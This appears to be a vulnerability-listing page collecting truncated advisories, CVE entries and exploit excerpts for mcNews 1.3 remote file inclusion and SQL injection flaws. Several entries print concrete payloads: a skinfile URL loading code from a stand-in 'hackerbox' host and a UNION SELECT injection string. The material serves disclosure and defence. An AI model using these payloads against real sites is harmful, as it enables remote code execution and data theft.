EUVD-2005-0721

Malware in sbrugna...

EUVD-2005-0801

Malware in sbrugna...

mcNews 1.x File Disclosure Vulnerability

No description provided by source. source: http://www.securityfocus.com/bid/4770/info mcNews is a set of scripts for allowing users to post news stories on a webpage. It will run on most Linux and Unix variants as well as Microsoft Windows operating systems. mcNews does not sufficiently filter...

PHP mcNews <= 1.3 (skinfile) Remote File Include Vulnerability

No description provided by source. Example: if registerglobals=on and allowurlfopen=on: http://victim/dir/mcNews/admin/header.php?skinfile=http://hackerbox/ milw0rm.com 2005-03-07...

McNews 1.x Install.PHP Arbitrary File Include Vulnerability

No description provided by source. !/usr/bin/env python coding: utf-8 import re from pocsuite.net import req from pocsuite.poc import Output, POCBase from pocsuite.utils import register class McNewsRemoteFileIncludePOCBase: vulID = '78899' version = '1' vulDate = '2005-03-17' author = ' '...

MCnews 1.3 SQL Injection

:: MCnews 1.3 :: Download: http://www.phpforums.net/mcNews1.3.zip link off :: Vendor: www.phpforums.net :: Author: s4r4d0 :: mail: [email protected] :: Bug: Sql Injection found on lire.php file :: Exploit: http://host/mcNews/lire.php?n=-1+UNION+SELECT+1,2,@@version,4,5,6,7,8,9,10,11,12,13,14-- ::...

mcNews &#40;skinfile&#41; Remote File Include Vulnerability

------------------------------------------------------------------------------------------------------------------- MEFISTO PreSents... Script: mcNews Script Download: ftp://ftp1.comscripts.com/PHP/845mcnews-13.zip Contact: ilker Kandemir ilkerkandemiratmynet.com info: / MEFISTO /...

CVE-2005-0800

PHP remote file inclusion vulnerability in install.php in mcNews 1.3 and earlier allows remote attackers to execute arbitrary PHP code by modifying the l parameter to reference a URL on a remote web server that contains the code, a different vulnerability than CVE-2005-0720...

badroot-mcNews13.txt

-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- BadRoot Security Advisory 2005-0x01 -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- Thu Mar 17 2005 - 00:46 am GMT +1 Product: mcNews admin/install.php ... 33 if $table==1 34 35 include$l; 36 echo ''.$lGoAdmin.''; 37 ... Impact:...

CVE-2005-0800

CVE-2005-0800 describes a PHP remote file inclusion vulnerability in mcNews 1.3 and earlier. The flaw exists in install.php where the l parameter can be modified to reference a URL on a remote server containing PHP code, allowing an attacker to execute arbitrary PHP. The issue is triggered throug...

PHP mcNews arbitrary file inclusion

-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- BadRoot Security Advisory 2005-0x01 -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- Thu Mar 17 2005 - 00:46 am GMT +1 Product: mcNews =1.3 successfully exploited on 1.3 Vendor: http://www.phpforums.net/index.php?dir=dld Home Page Type: Arbitrary fil...

McNews 1.x - &#039;install.php&#039; Arbitrary File Inclusion

source: https://www.securityfocus.com/bid/12835/info mcNews is reportedly affected by a remote file include vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input to the 'install.php' script. This issue is reported to affect mcNews versions 1.3 a...

McNews 1.x - install.php Arbitrary File Inclusion

McNews 1.x - install.php Arbitrary File Inclusion source: https://www.securityfocus.com/bid/12835/info mcNews is reportedly affected by a remote file include vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input to the 'install.php' script. This...

phpmcnews13.txt

-- == -- == -- == -- == -- == -- == -- == -- == -- == -- Name: PHP mcNews Version: 1.3 Homepage: http://www.phpforums.net/index.php?dir=dld Author: Filip Groszynski VXSfx Date: 7 March 2005 -- == -- == -- == -- == -- == -- == -- == -- == -- == -- Vulnerable code in mcNews/admin/header.php:...

CVE-2005-0720

PHP remote file inclusion vulnerability in admin/header.php in PHP mcNews 1.3 allows remote attackers to execute arbitrary PHP code by modifying the skinfile parameter to reference a URL on a remote web server that contains the code...

CVE-2005-0720

CVE-2005-0720 documents a PHP remote file inclusion vulnerability in the admin/header.php component of mcNews 1.3 . An attacker can cause the application to execute arbitrary PHP code by altering the skinfile parameter to reference a URL on a remote server that contains the code. The description ...

PHP mcNews &lt;= 1.3 arbitrary file inclusion &#40;VXSfx&#41;

-- == -- == -- == -- == -- == -- == -- == -- == -- == -- Name: PHP mcNews Version: 1.3 Homepage: http://www.phpforums.net/index.php?dir=dld Author: Filip Groszynski VXSfx Date: 7 March 2005 -- == -- == -- == -- == -- == -- == -- == -- == -- == -- Vulnerable code in mcNews/admin/header.php: ? //...

CVE-2005-0720

PHP remote file inclusion vulnerability in admin/header.php in PHP mcNews 1.3 allows remote attackers to execute arbitrary PHP code by modifying the skinfile parameter to reference a URL on a remote web server that contains the code...

PHP mcNews 1.3 - skinfile Remote File Inclusion

PHP mcNews 1.3 - skinfile Remote File Inclusion Example: if registerglobals=on and allowurlfopen=on: http://victim/dir/mcNews/admin/header.php?skinfile=http://hackerbox/ milw0rm.com 2005-03-07...

PHP mcNews <= 1.3 (skinfile) Remote File Include Vulnerability

Exploit for unknown platform in category web applications ============================================================== PHP mcNews = 1.3 skinfile Remote File Include Vulnerability ============================================================== Example: if registerglobals=on and allowurlfopen=on:...